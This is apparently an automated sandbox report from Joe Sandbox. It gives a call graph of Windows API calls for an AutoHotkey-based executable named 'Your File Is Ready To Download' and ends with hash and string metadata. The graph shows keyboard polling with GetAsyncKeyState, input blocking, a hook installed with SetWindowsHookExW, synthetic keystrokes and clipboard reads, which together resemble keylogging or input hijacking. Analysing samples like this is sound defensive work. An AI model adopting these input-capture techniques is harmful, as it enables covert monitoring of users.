143122 140014e30 143120->143122 143123 140014e20 GetAsyncKeyState 143120->143123 143121->143096 143121->143120 143122->143120 143123->143096 143123->143122 143124->143119 143338 1400190e0 43 API calls 143124->143338 143126 140015064 143126->143127 143128 140015135 BlockInput 143127->143128 143149 14001514c 143127->143149 143128->143149 143129 140015e00 143130 140015ec6 143129->143130 143139 140015e14 143129->143139 143133 140015ed0 143130->143133 143134 140015ee6 GetTickCount 143130->143134 143131 140015e84 143341 140018d70 143131->143341 143132 14001517f GetTickCount 143135 14001519a PeekMessageW 143132->143135 143132->143149 143143 140015f53 GetAsyncKeyState GetAsyncKeyState 143133->143143 143144 140015f47 143133->143144 143134->143133 143138 140015efa 143134->143138 143136 1400151d1 GetTickCount 143135->143136 143137 1400151b4 143135->143137 143136->143149 143137->143136 143138->143133 143139->143131 143237 140019230 143139->143237 143141 140015ec1 143150 140016157 143141->143150 143151 1400160bd GetKeyState 143141->143151 143147 140015f83 143143->143147 143148 140015f86 GetAsyncKeyState 143143->143148 143152 140019230 39 API calls 143144->143152 143146 140015e75 143308 140018a20 143146->143308 143147->143148 143155 140015f96 143148->143155 143156 140015f99 GetAsyncKeyState 143148->143156 143149->143129 143149->143132 143153 140015cf0 143149->143153 143202 140016300 143149->143202 143339 14001a840 VkKeyScanExW 143149->143339 143159 14001615d AttachThreadInput 143150->143159 143160 14001616f 143150->143160 143151->143150 143158 1400160d0 GetKeyState 143151->143158 143152->143141 143168 140015cfd PostMessageW 143153->143168 143340 1400167e0 59 API calls _itow 143153->143340 143155->143156 143161 140015fa9 143156->143161 143162 140015fac GetAsyncKeyState 143156->143162 143165 140016103 143158->143165 143166 1400160e5 143158->143166 143159->143160 143167 14001618a 143160->143167 143174 14001617b BlockInput 143160->143174 143161->143162 143163 140015fbc 143162->143163 143164 140015fbf GetAsyncKeyState 143162->143164 143163->143164 143169 140015fd2 GetAsyncKeyState 143164->143169 143170 140015fcf 143164->143170 143173 140016d90 38 API calls 143165->143173 143345 140016d90 143166->143345 143175 14001621a 143167->143175 143182 140016193 143167->143182 143168->143149 143176 140015fe2 143169->143176 143177 140015fe5 GetAsyncKeyState 143169->143177 143170->143169 143178 140016121 GetForegroundWindow GetWindowThreadProcessId 143173->143178 143174->143167 143179 140016200 143175->143179 143180 140016220 GetForegroundWindow GetWindowThreadProcessId 143175->143180 143176->143177 143184 140015ff5 143177->143184 143178->143150 143181 14001613a 143178->143181 143179->143078 143180->143179 143185 1400161f9 143180->143185 143181->143150 143182->143179 143183 1400161de GetTickCount 143182->143183 143183->143179 143183->143185 143184->143144 143185->143179 143187 14000b976 CloseHandle 143186->143187 143188 14000b97c CreateMutexW GetLastError 143186->143188 143187->143188 143189 14000b9a2 143188->143189 143190 14000b9ab 143188->143190 143189->143114 143190->143189 143191 14000b9b0 CloseHandle 143190->143191 143191->143189 143193 14001a034 GetKeyboardLayoutNameW 143192->143193 143194 140014f3e 143192->143194 143196 14001a068 RegOpenKeyExW 143193->143196 143197 14001a133 143193->143197 143194->143112 143194->143117 143196->143197 143199 14001a098 RegQueryValueExW RegCloseKey 143196->143199 143197->143194 143198 14001a161 ActivateKeyboardLayout 143197->143198 143198->143194 143199->143197 143200 14001a0fc 143199->143200 143200->143197 143201 14001a14b LoadLibraryW 143200->143201 143201->143197 143215 14001634c 143202->143215 143203 1400167c6 143203->143149 143204 14001639a GetTickCount 143207 1400163b5 PeekMessageW 143204->143207 143204->143215 143205 140016664 143205->143203 143212 140019230 39 API calls 143205->143212 143206 140016633 143206->143203 143206->143205 143208 140016686 GetAsyncKeyState GetAsyncKeyState 143206->143208 143209 1400163ef GetTickCount 143207->143209 143219 1400163d2 143207->143219 143210 1400166b3 143208->143210 143211 1400166b6 GetAsyncKeyState 143208->143211 143209->143215 143210->143211 143213 1400166c7 143211->143213 143214 1400166ca GetAsyncKeyState 143211->143214 143212->143203 143213->143214 143216 1400166db 143214->143216 143217 1400166de GetAsyncKeyState 143214->143217 143215->143204 143215->143206 143218 140016d90 38 API calls 143215->143218 143223 140016451 GetAsyncKeyState GetAsyncKeyState 143215->143223 143229 140019230 39 API calls 143215->143229 143236 140016486 143215->143236 143216->143217 143221 1400166f2 GetAsyncKeyState 143217->143221 143222 1400166ef 143217->143222 143218->143215 143219->143209 143224 140016703 143221->143224 143225 140016706 GetAsyncKeyState 143221->143225 143222->143221 143226 140016489 GetAsyncKeyState 143223->143226 143223->143236 143224->143225 143227 140016717 143225->143227 143228 14001671a GetAsyncKeyState 143225->143228 143230 1400164a1 GetAsyncKeyState 143226->143230 143226->143236 143227->143228 143235 14001672b 143228->143235 143229->143215 143231 1400164b9 GetAsyncKeyState 143230->143231 143230->143236 143232 1400164d1 GetAsyncKeyState 143231->143232 143231->143236 143233 1400164e9 GetAsyncKeyState 143232->143233 143232->143236 143234 140016501 GetAsyncKeyState 143233->143234 143233->143236 143234->143236 143235->143205 143236->143215 143236->143226 143236->143230 143236->143231 143236->143232 143236->143233 143236->143234 143408 140017ff0 71 API calls 143236->143408 143238 140019238 143237->143238 143307 140019a37 143237->143307 143243 140019440 143238->143243 143244 1400193f0 143238->143244 143239 1400194b1 143241 1400194b8 143239->143241 143250 14001950a 143239->143250 143240 140019430 143240->143239 143247 140016d90 38 API calls 143240->143247 143248 1400194fa 143241->143248 143254 14001957c 143241->143254 143260 140016d90 38 API calls 143241->143260 143242 140019470 143246 140016d90 38 API calls 143242->143246 143243->143239 143243->143242 143245 140016d90 38 API calls 143243->143245 143244->143239 143244->143240 143252 140016d90 38 API calls 143244->143252 143245->143242 143246->143240 143247->143239 143248->143254 143258 140016d90 38 API calls 143248->143258 143249 1400195c9 143263 14001963a 143249->143263 143265 1400195d0 143249->143265 143251 14001953b 143250->143251 143250->143254 143256 140016d90 38 API calls 143250->143256 143257 140016d90 38 API calls 143251->143257 143252->143240 143253 1400195a8 143253->143249 143261 140016d90 38 API calls 143253->143261 143254->143249 143254->143253 143255 140016d90 38 API calls 143254->143255 143255->143253 143256->143251 143257->143248 143258->143254 143259 14001962c 143272 1400196ce 143259->143272 143273 14001974c 143259->143273 143260->143248 143261->143249 143262 140019612 143266 140016d90 38 API calls 143262->143266 143263->143259 143264 140019675 143263->143264 143267 140016d90 38 API calls 143263->143267 143268 140016d90 38 API calls 143264->143268 143265->143259 143265->143262 143269 140016d90 38 API calls 143265->143269 143266->143259 143267->143264 143271 14001968d 143268->143271 143269->143262 143270 1400196d2 143275 140019747 143270->143275 143277 140016d90 38 API calls 143270->143277 143271->143259 143278 140016d90 38 API calls 143271->143278 143272->143270 143280 140016d90 38 API calls 143272->143280 143274 1400197cf 143273->143274 143273->143275 143279 14001976f 143273->143279 143276 140019818 143274->143276 143281 1400197f8 143274->143281 143284 140016d90 38 API calls 143274->143284 143285 140016d90 38 API calls 143275->143285 143286 140019895 143275->143286 143282 140016d90 38 API calls 143276->143282 143277->143275 143278->143259 143283 140016d90 38 API calls 143279->143283 143280->143270 143281->143276 143288 140016d90 38 API calls 143281->143288 143282->143275 143287 140019791 143283->143287 143284->143281 143285->143286 143290 140016d90 38 API calls 143286->143290 143291 1400198cc 143286->143291 143289 140016d90 38 API calls 143287->143289 143288->143276 143292 1400197a9 143289->143292 143290->143291 143294 140016d90 38 API calls 143291->143294 143297 14001990b 143291->143297 143293 140016d90 38 API calls 143292->143293 143293->143275 143294->143297 143295 140019942 143296 140019990 143295->143296 143298 14001996f 143295->143298 143300 140016d90 38 API calls 143295->143300 143301 1400199bd 143296->143301 143303 140016d90 38 API calls 143296->143303 143304 1400199e5 143296->143304 143297->143295 143299 140016d90 38 API calls 143297->143299 143298->143296 143302 140016d90 38 API calls 143298->143302 143299->143295 143300->143298 143301->143304 143305 140016d90 38 API calls 143301->143305 143302->143296 143303->143301 143306 140019a3b GetWindowThreadProcessId 143304->143306 143304->143307 143305->143304 143306->143307 143307->143146 143309 140018cdd SetWindowsHookExW 143308->143309 143313 140018a45 143308->143313 143311 140018cc4 143309->143311 143310 140018b63 SendInput 143310->143311 143312 140018b85 143310->143312 143311->143131 143314 140018b93 143312->143314 143315 140018bc6 143312->143315 143313->143310 143316 140018aa9 143313->143316 143317 140018b5b 143313->143317 143322 140018b9b GetForegroundWindow 143314->143322 143315->143311 143321 140018be9 143315->143321 143318 140018ac0 PostThreadMessageW 143316->143318 143317->143310 143319 140018aeb GetTickCount 143318->143319 143320 140018adb Sleep 143318->143320 143332 140018b00 143319->143332 143320->143318 143320->143319 143323 140018bf0 PostThreadMessageW 143321->143323 143322->143315 143325 140018c1b GetTickCount 143323->143325 143326 140018c0b Sleep 143323->143326 143324 140018b09 PeekMessageW 143327 140018c74 GetTickCount 143324->143327 143328 140018b2b 143324->143328 143329 140018c30 PeekMessageW 143325->143329 143326->143323 143326->143325 143327->143317 143333 140018c87 Sleep 143327->143333 143328->143317 143330 140018c94 143329->143330 143331 140018c4e GetTickCount 143329->143331 143330->143311 143331->143311 143334 140018c5d Sleep 143331->143334 143332->143317 143332->143324 143332->143327 143333->143332 143334->143329 143335->143084 143336->143086 143337->143108 143338->143126 143339->143149 143340->143149 143342 140018d78 143341->143342 143344 140018db3 143341->143344 143342->143344 143409 140018950 10 API calls malloc 143342->143409 143344->143141 143346 140017375 143345->143346 143347 140016dc0 GetCurrentThreadId 143345->143347 143346->143165 143348 140016df8 143347->143348 143349 140016e32 143348->143349 143350 140016e25 143348->143350 143352 140016e2d 143349->143352 143411 14001adc0 MapVirtualKeyW 143349->143411 143410 14001b130 MapVirtualKeyW MapVirtualKeyW 143350->143410 143354 140016e94 143352->143354 143355 140016fbf 143352->143355 143356 140016eaa GetKeyboardState 143354->143356 143357 140016f4b 143354->143357 143358 140016fe9 BlockInput 143355->143358 143363 140016fff 143355->143363 143361 140016eba SetKeyboardState 143356->143361 143359 140016f73 143357->143359 143360 140016f5a PostMessageW 143357->143360 143358->143363 143362 140016f96 143359->143362 143364 140016f82 143359->143364 143360->143359 143361->143357 143367 140016f9f PostMessageW 143362->143367 143373 140017334 143362->143373 143365 140017052 GetForegroundWindow 143363->143365 143366 140017044 143363->143366 143377 14001707d 143363->143377 143369 140018d70 10 API calls 143364->143369 143370 140017060 143365->143370 143372 140017084 GetAsyncKeyState 143366->143372 143366->143377 143367->143373 143371 140016f94 143369->143371 143412 14001a180 9 API calls 143370->143412 143371->143367 143372->143377 143373->143346 143375 140018d70 10 API calls 143373->143375 143375->143346 143376 140017072 143376->143366 143378 140017131 143377->143378 143379 140017157 keybd_event 143377->143379 143384 1400171fc 143377->143384 143413 140018610 10 API calls 143378->143413 143383 14001714b 143379->143383 143385 14001719e 143379->143385 143381 14001722f 143386 14001731b 143381->143386 143391 140017272 keybd_event 143381->143391 143392 140017257 143381->143392 143383->143384 143415 140018f80 143383->143415 143384->143381 143388 140017231 143384->143388 143389 140017224 143384->143389 143385->143383 143390 1400171ac 143385->143390 143396 1400171be GetAsyncKeyState 143385->143396 143386->143373 143387 140017322 BlockInput 143386->143387 143387->143373 143395 140018d70 10 API calls 143388->143395 143394 140018d70 10 API calls 143389->143394 143414 14001a180 9 API calls 143390->143414 143399 140017270 143391->143399 143400 1400172ae 143391->143400 143420 140018610 10 API calls 143392->143420 143394->143381 143395->143381 143396->143390 143399->143386 143406 140018f80 3 API calls 143399->143406 143400->143399 143402 1400172b6 143400->143402 143404 1400172c6 GetAsyncKeyState 143400->143404 143421 14001a180 9 API calls 143402->143421 143403 1400171e3 143403->143383 143404->143402 143406->143386 143407 1400172ea 143407->143399 143408->143236 143409->143344 143410->143352 143411->143352 143412->143376 143413->143383 143414->143403 143416 140018f94 GetTickCount GetForegroundWindow 143415->143416 143417 140019055 143415->143417 143416->143417 143418 14001901c 143416->143418 143417->143384 143418->143417 143419 140019025 GetWindowTextW 143418->143419 143419->143417 143420->143399 143421->143407 143422 1400031c3 143423 1400031dd 143422->143423 143424 1400035a9 GetWindowRect GetWindowLongW SetWindowLongW 143423->143424 143425 14000321d 143423->143425 143559 14008e4b0 22 API calls _flush 143424->143559 143426 14000347d 143425->143426 143428 1400033fb 143425->143428 143429 14000322c 143425->143429 143431 14000348d GetWindowRect 143426->143431 143436 140003329 143426->143436 143432 140003461 143428->143432 143433 140003444 MulDiv 143428->143433 143428->143436 143429->143426 143438 140003235 143429->143438 143430 140003614 143430->143432 143435 140003688 MulDiv 143430->143435 143431->143436 143432->143436 143439 1400036d1 MulDiv 143432->143439 143433->143432 143434 1400032f9 GetWindowRect 143434->143436 143435->143432 143440 140003720 _cftof_l 143436->143440 143448 1400037d6 143436->143448 143437 1400032d1 SendMessageW 143444 1400032f4 143437->143444 143438->143434 143438->143437 143441 140003282 143438->143441 143439->143436 143445 140003734 SendMessageW 143440->143445 143441->143434 143443 140003286 143441->143443 143446 1400032a6 ScreenToClient SendMessageW 143443->143446 143447 140003290 SendMessageW 143443->143447 143444->143434 143450 14000376c 143445->143450 143463 140003821 143445->143463 143446->143444 143447->143444 143449 140003876 143448->143449 143454 140003887 143448->143454 143448->143463 143560 140005ff0 21 API calls 2 library calls 143449->143560 143450->143463 143453 140003b74 143455 140003bc3 143453->143455 143459 140003b95 143453->143459 143494 140001c40 143453->143494 143456 140003922 143454->143456 143462 14000390c 143454->143462 143454->143463 143461 140003bde DragFinish GetWindowLongW SetWindowLongW 143455->143461 143455->143494 143460 1400a8e00 20 API calls 143456->143460 143458 140001cc6 GetTickCount 143458->143494 143464 140003bb9 ShowWindow 143459->143464 143459->143494 143460->143463 143461->143494 143462->143463 143465 1400c8f74 malloc 10 API calls 143462->143465 143516 1400a1e00 143463->143516 143464->143494 143465->143463 143466 140001d4e GetMessageW 143466->143458 143467 140001d73 GetTickCount 143466->143467 143467->143494 143468 140001d21 GetTickCount 143468->143494 143501 140001d3c wcsncpy 143468->143501 143470 14000218f GetFocus 143470->143494 143471 140002a33 GetForegroundWindow 143473 140002a45 GetWindowThreadProcessId 143471->143473 143475 140002a5c GetClassNameW 143473->143475 143474 140002563 IsDialogMessageW 143474->143494 143476 140002a8e IsDialogMessageW 143475->143476 143476->143494 143478 1400026da ShowWindow 143478->143494 143479 1400021da TranslateAcceleratorW 143479->143494 143481 140002ade SetCurrentDirectoryW 143481->143494 143483 1400040e0 GetTickCount 143483->143501 143484 1400024e5 SendMessageW 143484->143494 143485 1400023d7 GetKeyState 143488 1400023ee GetKeyState 143485->143488 143485->143494 143486 140002501 SendMessageW 143486->143494 143487 140003fc9 143489 14000403e 143487->143489 143495 14000401a KillTimer 143487->143495 143488->143494 143490 1400024a3 PostMessageW 143490->143501 143491 1400022be GetKeyState 143491->143494 143492 140002440 SendMessageW 143492->143494 143493 140002466 SendMessageW 143493->143494 143494->143458 143494->143466 143494->143468 143494->143470 143494->143471 143494->143474 143494->143478 143494->143479 143494->143481 143494->143484 143494->143485 143494->143486 143494->143490 143494->143491 143494->143492 143494->143493 143496 1400022e8 GetWindowLongW 143494->143496 143497 140002359 IsWindowEnabled 143494->143497 143498 14000300d DragFinish 143494->143498 143499 140002377 GetKeyState 143494->143499 143494->143501 143504 140004160 143494->143504 143533 1400049f0 143494->143533 143548 1400b2890 GetWindowLongW GetParent GetWindowLongW 143494->143548 143549 14008aa60 GetWindowLongW GetParent 143494->143549 143550 140004440 joyGetPosEx 143494->143550 143495->143489 143496->143494 143497->143494 143498->143494 143499->143494 143500 1400030d7 GetTickCount 143500->143501 143501->143458 143501->143483 143501->143487 143501->143494 143501->143500 143547 1400045e0 146 API calls wcsncpy 143501->143547 143551 1400048a0 143501->143551 143505 140004174 143504->143505 143507 140004404 143504->143507 143505->143507 143561 140004db0 143505->143561 143507->143494 143508 14000420c GetTickCount 143513 14000419f wcsncpy 143508->143513 143509 1400043e6 143509->143507 143510 1400049f0 43 API calls 143509->143510 143510->143507 143512 1400048a0 4 API calls 143512->143513 143513->143507 143513->143508 143513->143509 143513->143512 143514 1400a1e00 134 API calls 143513->143514 143515 140004354 KillTimer 143513->143515 143566 140024970 KillTimer 143513->143566 143514->143513 143515->143513 143517 1400a1e7c _flush 143516->143517 143517->143517 143567 140001930 143517->143567 143518 1400a1fbb 143518->143453 143520 1400a1f95 143520->143518 143570 140014440 16 API calls 143520->143570 143522 1400a1fd5 143522->143518 143572 140014440 16 API calls 143522->143572 143523 1400a1fa9 143524 1400a1fb0 143523->143524 143525 1400a2023 143523->143525 143571 1400caf60 20 API calls _wcstoui64 143524->143571 143574 1400ca468 20 API calls _wcstoui64 143525->143574 143529 1400a2005 143529->143525 143530 1400a200c 143529->143530 143573 1400caf60 20 API calls _wcstoui64 143530->143573 143534 140004a12 143533->143534 143535 140004b31 143534->143535 143538 140004b41 143534->143538 143545 140004ac4 143534->143545 143575 140005ff0 21 API calls 2 library calls 143535->143575 143537 14001f2d8 143537->143494 143539 140004bec 143538->143539 143544 140004bcf 143538->143544 143538->143545 143543 1400a8e00 20 API calls 143539->143543 143540 14001f291 LoadImageW 143542 14001f2bb Shell_NotifyIconW 143540->143542 143541 14001f288 143541->143542 143542->143537 143543->143545 143544->143545 143546 1400c8f74 malloc 10 API calls 143544->143546 143545->143537 143545->143540 143545->143541 143545->143542 143546->143545 143547->143501 143548->143494 143549->143494 143550->143494 143553 1400048d3 143551->143553 143552 140004912 143555 140004940 SetCurrentDirectoryW 143552->143555 143556 140004946 143552->143556 143553->143552 143576 14001f1e0 143553->143576 143555->143556 143557 1400049ba GetTickCount 143556->143557 143558 14000317d GetTickCount 143556->143558 143557->143558 143558->143501 143559->143430 143560->143463 143562 140004dbd 143561->143562 143563 140004e0a 143561->143563 143562->143563 143564 140004de8 GetTickCount 143562->143564 143563->143513 143564->143563 143565 140004e03 143564->143565 143565->143563 143566->143513 143568 140031f30 134 API calls 143567->143568 143569 14000195e 143568->143569 143569->143518 143569->143520 143569->143522 143570->143523 143571->143518 143572->143529 143573->143518 143574->143518 143575->143545 143577 14001f2d8 143576->143577 143580 14001f1f7 143576->143580 143577->143552 143578 14001f291 LoadImageW 143581 14001f2bb Shell_NotifyIconW 143578->143581 143579 14001f288 143579->143581 143580->143577 143580->143578 143580->143579 143580->143581 143581->143577 143582 140036787 143592 140031fd7 143582->143592 143583 14003851b 143584 140032011 GetTickCount 143587 140032030 PeekMessageW 143584->143587 143584->143592 143585 140031fea GlobalUnlock 143586 140031ffe CloseClipboard 143585->143586 143586->143584 143588 140032059 GetTickCount 143587->143588 143587->143592 143588->143592 143589 140032111 GetTickCount 143589->143592 143590 140088c90 134 API calls 143590->143592 143591 140031f30 134 API calls 143591->143592 143592->143583 143592->143584 143592->143585 143592->143586 143592->143588 143592->143589 143592->143590 143592->143591 143593 140055950 143594 14005597d RegisterWindowMessageW 143593->143594 143596 140055999 143593->143596 143594->143596 143595 1400559e7 143597 140055b8a 143595->143597 143598 140055a2c 143595->143598 143628 1400559eb 143595->143628 143596->143595 143661 1400044c0 146 API calls 143596->143661 143600 140055b97 143597->143600 143601 1400560fd 143597->143601 143602 140055a40 143598->143602 143620 140056041 143598->143620 143603 1400560b2 143600->143603 143604 140055b9d 143600->143604 143609 140056147 143601->143609 143610 14005610c 143601->143610 143601->143620 143662 140056640 PostMessageW 143602->143662 143613 1400560ce SendMessageTimeoutW 143603->143613 143603->143628 143606 140055baa 143604->143606 143607 14005602b 143604->143607 143617 140055bb0 143606->143617 143618 140055fea GetMenu CheckMenuItem 143606->143618 143607->143609 143619 140055c31 143607->143619 143607->143620 143608 1400561c9 143615 140056159 PostMessageW 143609->143615 143622 14005617c 143609->143622 143614 140056119 PostMessageW 143610->143614 143610->143620 143611 14005606d DefWindowProcW 143611->143628 143612 140055b7b 143612->143611 143616 140055b83 143612->143616 143613->143628 143621 140004db0 GetTickCount 143614->143621 143615->143622 143616->143628 143617->143619 143617->143620 143623 140055fb5 143617->143623 143630 140055bcf 143617->143630 143618->143611 143618->143619 143619->143611 143619->143628 143620->143608 143620->143611 143663 14001f0f0 Shell_NotifyIconW wcsncpy _cftof_l 143620->143663 143621->143616 143625 140056188 SendMessageTimeoutW 143622->143625 143622->143628 143623->143611 143629 140055fdb 143623->143629 143625->143628 143626 14005605f 143626->143611 143627 14001f1e0 2 API calls 143626->143627 143627->143611 143631 140055fdd ShowWindow 143629->143631 143632 140055be1 143630->143632 143634 140055c1e 143630->143634 143631->143628 143632->143631 143633 140055bed MoveWindow 143632->143633 143633->143628 143634->143611 143634->143619 143635 140055ccd 143634->143635 143636 140055eac 143634->143636 143638 140055d45 143635->143638 143639 140055cd3 143635->143639 143636->143628 143637 140055ec3 GetClientRect 143636->143637 143640 140055ee7 143637->143640 143641 140055e78 143638->143641 143642 140055d52 143638->143642 143639->143611 143644 140055cfb 143639->143644 143646 140055cf6 143639->143646 143645 140055f54 MoveWindow InvalidateRect 143640->143645 143648 140055f2e 143640->143648 143649 140055f19 MoveWindow 143640->143649 143641->143611 143643 140055e82 GetClipBox FillRect 143641->143643 143653 140055dd5 DrawIconEx 143642->143653 143654 140055d74 CreateCompatibleDC SelectObject BitBlt SelectObject DeleteDC 143642->143654 143643->143628 143647 140055d0b SetBkColor 143644->143647 143645->143628 143646->143644 143650 140055d00 GetSysColor 143646->143650 143651 140055d21 SetTextColor 143647->143651 143652 140055d2a 143647->143652 143655 140055f37 MoveWindow 143648->143655 143656 140055f52 143648->143656 143649->143648 143650->143647 143651->143652 143652->143628 143657 140055d37 GetSysColorBrush 143652->143657 143658 140055e01 ExcludeClipRect CreateRectRgn GetClipRgn 143653->143658 143654->143658 143655->143656 143656->143645 143657->143628 143659 140055e56 FillRgn DeleteObject 143658->143659 143660 140055e4d GetSysColorBrush 143658->143660 143659->143628 143660->143659 143661->143595 143662->143612 143663->143626 143664 1400249d0 143665 140024a08 143664->143665 143668 1400ca630 20 API calls 143665->143668 143670 140024a32 143665->143670 143666 140024b1c 143672 140024b49 KillTimer 143666->143672 143675 140024b70 143666->143675 143667 140024acd 143669 140024af8 SetTimer 143667->143669 143667->143675 143668->143670 143669->143675 143670->143666 143670->143667 143674 140024a75 143670->143674 143671 140024bf0 143681 140024c6c 143671->143681 143687 1400ca754 16 API calls _wcstoui64 143671->143687 143672->143675 143673 140024c95 GetTickCount 143673->143674 143675->143671 143676 140024bf2 143675->143676 143684 1400ca754 16 API calls _wcstoui64 143675->143684 143686 1400ca468 20 API calls _wcstoui64 143676->143686 143680 140024bde 143680->143676 143682 140024be2 143680->143682 143681->143673 143681->143674 143685 1400caf60 20 API calls _wcstoui64 143682->143685 143684->143680 143685->143671 143686->143671 143687->143681 143688 14003594d 143689 14003595e 143688->143689 143698 140031fd7 143688->143698 143690 140014ba0 197 API calls 143689->143690 143690->143698 143691 14003851b 143692 140032011 GetTickCount 143695 140032030 PeekMessageW 143692->143695 143692->143698 143693 140031fea GlobalUnlock 143694 140031ffe CloseClipboard 143693->143694 143694->143692 143696 140032059 GetTickCount 143695->143696 143695->143698 143696->143698 143697 140032111 GetTickCount 143697->143698 143698->143691 143698->143692 143698->143693 143698->143694 143698->143696 143698->143697 143699 140088c90 134 API calls 143698->143699 143700 140031f30 134 API calls 143698->143700 143699->143698 143700->143698 143701 140056318 143702 140004db0 GetTickCount 143701->143702 143703 14005631d 143702->143703 143704 140056325 PostMessageW 143703->143704 143705 14005607f 143703->143705 143706 140035b17 143718 1400b0af0 143706->143718 143708 14003851b 143709 140032011 GetTickCount 143712 140032030 PeekMessageW 143709->143712 143716 140031fd7 143709->143716 143710 140031fea GlobalUnlock 143711 140031ffe CloseClipboard 143710->143711 143711->143709 143713 140032059 GetTickCount 143712->143713 143712->143716 143713->143716 143714 140032111 GetTickCount 143714->143716 143715 140088c90 134 API calls 143715->143716 143716->143708 143716->143709 143716->143710 143716->143711 143716->143713 143716->143714 143716->143715 143717 140031f30 134 API calls 143716->143717 143717->143716 143719 1400b0b25 143718->143719 143720 1400b0b98 143719->143720 143722 1400b0b48 GetForegroundWindow 143719->143722 143721 1400b12d0 95 API calls 143720->143721 143723 1400b0bc1 143720->143723 143721->143723 143722->143720 143724 1400b0b56 143722->143724 143725 1400b0c0c 143723->143725 143733 1400b0bce 143723->143733 143726 1400b0b5f IsWindowVisible 143724->143726 143727 1400b0b78 IsIconic 143724->143727 143736 1400b0cd0 54 API calls 143725->143736 143726->143720 143729 1400b0b6c 143726->143729 143730 1400b0b93 143727->143730 143731 1400b0b85 ShowWindow 143727->143731 143735 1400b29a0 LoadLibraryW GetProcAddress 143729->143735 143730->143733 143731->143730 143733->143716 143734 1400b0b74 143734->143720 143734->143727 143735->143734 143736->143733 143737 14003b25c 143738 1400b10d0 93 API calls 143737->143738 143739 14003b28e 143738->143739 143740 14001f919 143741 14001f94b wcsncpy 143740->143741 143742 14001f1e0 2 API calls 143741->143742 143743 14001f9ac 143742->143743 143744 14001f9df 143743->143744 143745 14001f9d9 SetCurrentDirectoryW 143743->143745 143746 140001930 134 API calls 143744->143746 143749 14001fa0e 143744->143749 143745->143744 143746->143749 143747 14001fa73 143748 14001fa9d 143747->143748 143759 14001fac6 143747->143759 143750 1400049f0 43 API calls 143748->143750 143749->143747 143786 1400a65e0 135 API calls 143749->143786 143752 14001faa7 143750->143752 143753 14001fae2 143754 14001fc96 IsWindow 143755 14001fcac DestroyWindow 143754->143755 143756 14001fcc0 143754->143756 143755->143756 143760 14000cf50 PostQuitMessage 143756->143760 143758 14001fcc8 143759->143753 143759->143754 143761 14000cf86 143760->143761 143762 14000d0e6 143761->143762 143763 14000cf9b 143761->143763 143765 14000d0f2 UnhookWindowsHookEx 143762->143765 143770 14000d0f8 143762->143770 143764 14000cfa3 PostThreadMessageW 143763->143764 143766 14000cfce GetTickCount 143764->143766 143767 14000cfbe Sleep 143764->143767 143765->143770 143769 14000cfe0 GetExitCodeThread 143766->143769 143767->143764 143767->143766 143768 14000d19b 143771 14000d015 CloseHandle 143769->143771 143772 14000cffc GetTickCount 143769->143772 143770->143768 143773 14000d136 UnregisterHotKey 143770->143773 143775 14000d02e 143771->143775 143774 14000d00b Sleep 143772->143774 143772->143775 143773->143770 143774->143769 143776 14000d056 143775->143776 143777 14000d037 143775->143777 143779 14000d06f 143776->143779 143780 14000d05b CloseHandle 143776->143780 143778 14000d03c CreateMutexW 143777->143778 143777->143779 143778->143779 143781 14000d098 143779->143781 143782 14000d078 143779->143782 143780->143779 143783 14000d0b2 143781->143783 143785 14000d09e CloseHandle 143781->143785 143782->143783 143784 14000d07e CreateMutexW 143782->143784 143783->143762 143784->143783 143785->143783 143786->143747 143787 14001fd1e 143788 1400a8e90 20 API calls 143787->143788 143789 14001fd23 143788->143789 143791 1400a8e90 20 API calls 143789->143791 143792 14001fd42 143789->143792 143790 14002028c 143791->143792 143792->143790 143813 140028120 46 API calls _flush 143792->143813 143794 14001fed6 SetCurrentDirectoryW 143815 140028120 46 API calls _flush 143794->143815 143795 14001fe97 143795->143794 143805 140020224 143795->143805 143814 140041040 OutputDebugStringW 143795->143814 143798 14001fefe 143798->143805 143816 140028120 46 API calls _flush 143798->143816 143799 140040f40 OutputDebugStringW _errno _invalid_parameter_noinfo 143800 14001fde1 143799->143800 143800->143790 143800->143795 143800->143799 143802 14001ff1b 143804 140020001 143802->143804 143802->143805 143807 14001ffb9 143802->143807 143808 140020011 143802->143808 143803 140020210 GetSystemTimeAsFileTime 143803->143805 143817 140005ff0 21 API calls 2 library calls 143804->143817 143807->143803 143808->143807 143809 140020095 143808->143809 143810 1400200b2 143808->143810 143809->143807 143812 1400c8f74 malloc 10 API calls 143809->143812 143811 1400a8e00 20 API calls 143810->143811 143811->143807 143812->143807 143813->143800 143814->143794 143815->143798 143816->143802 143817->143807

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Thread$CountTickWindow$Process$AsyncCloseHandleInputState$AddressAttachBlockCreateCurrentErrorForegroundFreeInfoKeyboardLastLayoutLibraryMessageMutexPeekProc_errno_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: AHK Keybd$KbdLayerDescriptor$^+!#{}${Blind}${Click${Text}
                                                                                                                                                                                                                          • API String ID: 4276635616-2714328142
                                                                                                                                                                                                                          • Opcode ID: b4484f7a6154cae6bae15ad0fcdeb02ab40105df5a35eac3e4a0612e0d447eaf
                                                                                                                                                                                                                          • Instruction ID: b6aca26402dbd9a584f7ca152b4954a8adead1e6d94965108ae59bc031915438
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4484f7a6154cae6bae15ad0fcdeb02ab40105df5a35eac3e4a0612e0d447eaf
